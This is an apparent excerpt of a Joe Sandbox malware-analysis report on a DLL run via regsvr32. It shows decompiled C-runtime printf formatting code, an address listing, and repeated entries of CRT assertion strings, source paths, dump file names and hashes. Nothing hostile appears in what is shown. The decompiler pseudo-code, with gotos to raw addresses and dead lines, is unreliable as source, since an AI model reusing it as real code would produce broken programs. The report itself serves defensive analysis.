                                                                                        				_a84 = 0x2b;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                                                        				_a84 = 0x20;
                                                                                        				_a92 = 1;
                                                                                        				_a840 = _a88 - _a104 - _a92;
                                                                                        				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                                                        				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                                        				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                        				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                                                        				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                                                        				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                                                        				if (_a76 == 0) goto 0xf9d3cc1d;
                                                                                        				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                                                        				_a872 = 0;
                                                                                        				_a848 = _a64;
                                                                                        				_a856 = _a104;
                                                                                        				_a856 = _a856 - 1;
                                                                                        				if (_a856 == 0) goto 0xf9d3cc1b;
                                                                                        				_a1056 =  *_a848 & 0x0000ffff;
                                                                                        				r9d = _a1056 & 0x0000ffff;
                                                                                        				r8d = 6;
                                                                                        				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                                                        				_a848 =  &(_a848[1]);
                                                                                        				if (_a872 != 0) goto 0xf9d3cbe5;
                                                                                        				if (_a860 != 0) goto 0xf9d3cbf2;
                                                                                        				_a688 = 0xffffffff;
                                                                                        				goto 0xf9d3cc1b;
                                                                                        				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                        				goto 0xf9d3cb60;
                                                                                        				goto 0xf9d3cc3b;
                                                                                        				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                        				if (_a688 < 0) goto 0xf9d3cc6e;
                                                                                        				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                                                        				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                                        				if (_a96 == 0) goto 0xf9d3cc8e;
                                                                                        				0xf9d25330();
                                                                                        				_a96 = 0;
                                                                                        				goto 0xf9d3b99c;
                                                                                        				if (_a704 == 0) goto 0xf9d3ccb4;
                                                                                        				if (_a704 == 7) goto 0xf9d3ccb4;
                                                                                        				_a1060 = 0;
                                                                                        				goto 0xf9d3ccbf;
                                                                                        				_a1060 = 1;
                                                                                        				_t252 = _a1060;
                                                                                        				_a876 = _t252;
                                                                                        				if (_a876 != 0) goto 0xf9d3cd05;
                                                                                        				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                        				_a32 = _t354;
                                                                                        				r9d = 0;
                                                                                        				r8d = 0x8f5;
                                                                                        				0xf9d2b3b0();
                                                                                        				if (_t252 != 1) goto 0xf9d3cd05;
                                                                                        				asm("int3");
                                                                                        				if (_a876 != 0) goto 0xf9d3cd61;
                                                                                        				0xf9d2ab30();
                                                                                        				 *_t354 = 0x16;
                                                                                        				_a32 = 0;
                                                                                        				r9d = 0x8f5;
                                                                                        				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        				_a912 = 0xffffffff;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				goto 0xf9d3cd80;
                                                                                        				_a916 = _a688;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        			}











                                                                                        0x7fef9d3c719
                                                                                        0x7fef9d3c719
                                                                                        0x7fef9d3c724
                                                                                        0x7fef9d3c737
                                                                                        0x7fef9d3c739
                                                                                        0x7fef9d3c748
                                                                                        0x7fef9d3c74c
                                                                                        0x7fef9d3c756
                                                                                        0x7fef9d3c769
                                                                                        0x7fef9d3c76f
                                                                                        0x7fef9d3c782
                                                                                        0x7fef9d3c78c
                                                                                        0x7fef9d3c791
                                                                                        0x7fef9d3c799
                                                                                        0x7fef9d3c7a9
                                                                                        0x7fef9d3c7b3
                                                                                        0x7fef9d3c7b8
                                                                                        0x7fef9d3c7c0
                                                                                        0x7fef9d3c7ce
                                                                                        0x7fef9d3c7d9
                                                                                        0x7fef9d3c7e8
                                                                                        0x7fef9d3c7ec
                                                                                        0x7fef9d3c7f4
                                                                                        0x7fef9d3c7fe
                                                                                        0x7fef9d3c806
                                                                                        0x7fef9d3c80e
                                                                                        0x7fef9d3c819
                                                                                        0x7fef9d3c823
                                                                                        0x7fef9d3c82a
                                                                                        0x7fef9d3c832
                                                                                        0x7fef9d3c83c
                                                                                        0x7fef9d3c843
                                                                                        0x7fef9d3c854
                                                                                        0x7fef9d3c85f
                                                                                        0x7fef9d3c86c
                                                                                        0x7fef9d3c878
                                                                                        0x7fef9d3c880
                                                                                        0x7fef9d3c882
                                                                                        0x7fef9d3c88a
                                                                                        0x7fef9d3c89d
                                                                                        0x7fef9d3c8aa
                                                                                        0x7fef9d3c8bf
                                                                                        0x7fef9d3c8cc
                                                                                        0x7fef9d3c8ce
                                                                                        0x7fef9d3c8d6
                                                                                        0x7fef9d3c8df
                                                                                        0x7fef9d3c8eb
                                                                                        0x7fef9d3c8ed
                                                                                        0x7fef9d3c8fe
                                                                                        0x7fef9d3c900
                                                                                        0x7fef9d3c910
                                                                                        0x7fef9d3c915
                                                                                        0x7fef9d3c91f
                                                                                        0x7fef9d3c925
                                                                                        0x7fef9d3c930
                                                                                        0x7fef9d3c93b
                                                                                        0x7fef9d3c95e
                                                                                        0x7fef9d3c96a
                                                                                        0x7fef9d3c997
                                                                                        0x7fef9d3c9a9
                                                                                        0x7fef9d3c9ab
                                                                                        0x7fef9d3c9bf
                                                                                        0x7fef9d3c9c9
                                                                                        0x7fef9d3c9ce
                                                                                        0x7fef9d3c9e0
                                                                                        0x7fef9d3c9ec
                                                                                        0x7fef9d3c9fc
                                                                                        0x7fef9d3ca03
                                                                                        0x7fef9d3ca10
                                                                                        0x7fef9d3ca1a
                                                                                        0x7fef9d3ca24
                                                                                        0x7fef9d3ca2d
                                                                                        0x7fef9d3ca36
                                                                                        0x7fef9d3ca45
                                                                                        0x7fef9d3ca52
                                                                                        0x7fef9d3ca54
                                                                                        0x7fef9d3ca59
                                                                                        0x7fef9d3ca61
                                                                                        0x7fef9d3ca6c
                                                                                        0x7fef9d3ca6e
                                                                                        0x7fef9d3ca73
                                                                                        0x7fef9d3ca7b
                                                                                        0x7fef9d3ca86
                                                                                        0x7fef9d3ca88
                                                                                        0x7fef9d3ca8d
                                                                                        0x7fef9d3caa5
                                                                                        0x7fef9d3cab5
                                                                                        0x7fef9d3cad0
                                                                                        0x7fef9d3caee
                                                                                        0x7fef9d3cafc
                                                                                        0x7fef9d3cb07
                                                                                        0x7fef9d3cb22
                                                                                        0x7fef9d3cb2c
                                                                                        0x7fef9d3cb37
                                                                                        0x7fef9d3cb3d
                                                                                        0x7fef9d3cb4d
                                                                                        0x7fef9d3cb59
                                                                                        0x7fef9d3cb70
                                                                                        0x7fef9d3cb79
                                                                                        0x7fef9d3cb8a
                                                                                        0x7fef9d3cb92
                                                                                        0x7fef9d3cb9b
                                                                                        0x7fef9d3cbb6
                                                                                        0x7fef9d3cbc9
                                                                                        0x7fef9d3cbd9
                                                                                        0x7fef9d3cbe3
                                                                                        0x7fef9d3cbe5
                                                                                        0x7fef9d3cbf0
                                                                                        0x7fef9d3cc11
                                                                                        0x7fef9d3cc16
                                                                                        0x7fef9d3cc1b
                                                                                        0x7fef9d3cc36
                                                                                        0x7fef9d3cc43
                                                                                        0x7fef9d3cc4e
                                                                                        0x7fef9d3cc69
                                                                                        0x7fef9d3cc74
                                                                                        0x7fef9d3cc80
                                                                                        0x7fef9d3cc85
                                                                                        0x7fef9d3cc8e
                                                                                        0x7fef9d3cc9b
                                                                                        0x7fef9d3cca5
                                                                                        0x7fef9d3cca7
                                                                                        0x7fef9d3ccb2
                                                                                        0x7fef9d3ccb4
                                                                                        0x7fef9d3ccbf
                                                                                        0x7fef9d3ccc6
                                                                                        0x7fef9d3ccd5
                                                                                        0x7fef9d3ccd7
                                                                                        0x7fef9d3ccde
                                                                                        0x7fef9d3cce3
                                                                                        0x7fef9d3cce6
                                                                                        0x7fef9d3ccf8
                                                                                        0x7fef9d3cd00
                                                                                        0x7fef9d3cd02
                                                                                        0x7fef9d3cd0d
                                                                                        0x7fef9d3cd0f
                                                                                        0x7fef9d3cd14
                                                                                        0x7fef9d3cd1a
                                                                                        0x7fef9d3cd23
                                                                                        0x7fef9d3cd3e
                                                                                        0x7fef9d3cd43
                                                                                        0x7fef9d3cd53
                                                                                        0x7fef9d3cd5f
                                                                                        0x7fef9d3cd68
                                                                                        0x7fef9d3cd74
                                                                                        0x7fef9d3cd97

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: get_int64_arg
                                                                                        • String ID: '$0$9
                                                                                        • API String ID: 1967237116-269856862
                                                                                        • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                                        • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                                                                        • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                                        • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                                                                        • String ID: csm
                                                                                        • API String ID: 2005287440-1018135373
                                                                                        • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                                                        • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                                                                        • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                                                        • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName__initmbctable
                                                                                        • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                                                                        • API String ID: 3548084100-1254873407
                                                                                        • Opcode ID: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                                        • Instruction ID: 40487cdd99e7390fc7cfa00da240fffb72a0e4e16c6d4a8cb9187a6270b67cf4
                                                                                        • Opcode Fuzzy Hash: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                                        • Instruction Fuzzy Hash: 09410C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                        • API String ID: 2123368286-3717698799
                                                                                        • Opcode ID: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                                                        • Instruction ID: db9b60f6e9b20c9f37adeee518bf084cd0881f5c38580f5bd04c1ce4cfd39116
                                                                                        • Opcode Fuzzy Hash: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                                                        • Instruction Fuzzy Hash: 49412931E1C7868AEAB08B24E84476E62E0F385365F604335D6ED427E5CB3EE444CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                                                                        • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                                        • API String ID: 2306298712-3864165772
                                                                                        • Opcode ID: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                                                        • Instruction ID: b637de57708ed2c7d115ffe7a667dd769ed1fe34c6e506efeb830bf347bff847
                                                                                        • Opcode Fuzzy Hash: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                                                        • Instruction Fuzzy Hash: D8313D32609BC585E7B08B19E84076EB3E1F385764F618225CAED877E4DB3DE405CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                                        • API String ID: 2123368286-2562677240
                                                                                        • Opcode ID: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                                                        • Instruction ID: c85490607768c44f9eb9442c12c0ad7794bb5914cb74fa2bef1d73063ee62390
                                                                                        • Opcode Fuzzy Hash: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                                                        • Instruction Fuzzy Hash: 67311632A0DB8685EAB09B15E8407AEB7E1F385390F204625D6DD43BE8DB7ED444CB02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter$__doserrno
                                                                                        • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                                                                        • API String ID: 1181141450-2845860089
                                                                                        • Opcode ID: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                                                        • Instruction ID: a2d3a4357c877c10dbeba88c1570b3bcf2b7b0db3c51835aaf51b50bd6ce4727
                                                                                        • Opcode Fuzzy Hash: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                                                        • Instruction Fuzzy Hash: 25316D36A28A4286E7909B19E88476E77E0F380794F205125F6CE477F5CB7ED841CF42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                                                                        • API String ID: 2123368286-160817255
                                                                                        • Opcode ID: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                                                        • Instruction ID: f81691e69628683e8e3df4f52d5e63bc79cedec177f2501b48199eede19b8a9f
                                                                                        • Opcode Fuzzy Hash: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                                                        • Instruction Fuzzy Hash: 7E218E71B2D6428AE7D89B24EC8476DB3E1F390395F609635E1DE476E4D77ED4018B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                                                                        • API String ID: 2123368286-3409824857
                                                                                        • Opcode ID: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                                                        • Instruction ID: aea6e50ad225ee654e5ba897f2371f9ab8692fab447ee5272478533351973a17
                                                                                        • Opcode Fuzzy Hash: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                                                        • Instruction Fuzzy Hash: 69214C72A2D64286EB909F58E84476EB7E0F380394F605125E6CE47AE4CBBED444CF42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_
                                                                                        • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                                                                        • API String ID: 1901436342-3621827421
                                                                                        • Opcode ID: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                                                        • Instruction ID: b6da7cfe51097e189ae1413993ad3b1820e6f9d9ec5e09c8ec6feaf0c9b902cc
                                                                                        • Opcode Fuzzy Hash: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                                                        • Instruction Fuzzy Hash: 6D210132918A8186E790DB64E8516AEB7E0F7C4780F614122E7CD83AB9DB7DD954CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                                                                        • API String ID: 2123368286-2972513288
                                                                                        • Opcode ID: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                                                        • Instruction ID: 6381d33894c21e9a570bb340808ef8ba759c91e84b1c9252353dd9e19991e7ba
                                                                                        • Opcode Fuzzy Hash: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                                                        • Instruction Fuzzy Hash: 64211A31E1D242CAE7E08F28EC44B6E72E1F344395F605536A6CA866B4D77EE944CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                                                                        • API String ID: 2123368286-367560414
                                                                                        • Opcode ID: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                                                        • Instruction ID: a1605579a08129191013953cda15cb2ece86ed32ec4905bca1088ce11b277eda
                                                                                        • Opcode Fuzzy Hash: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                                                        • Instruction Fuzzy Hash: EB114931E0C64A89F7E08B14EC457BE62E0F750385F608525D2DD46AF9CBBEE4888F01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                                                                        • API String ID: 2123368286-2992382544
                                                                                        • Opcode ID: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
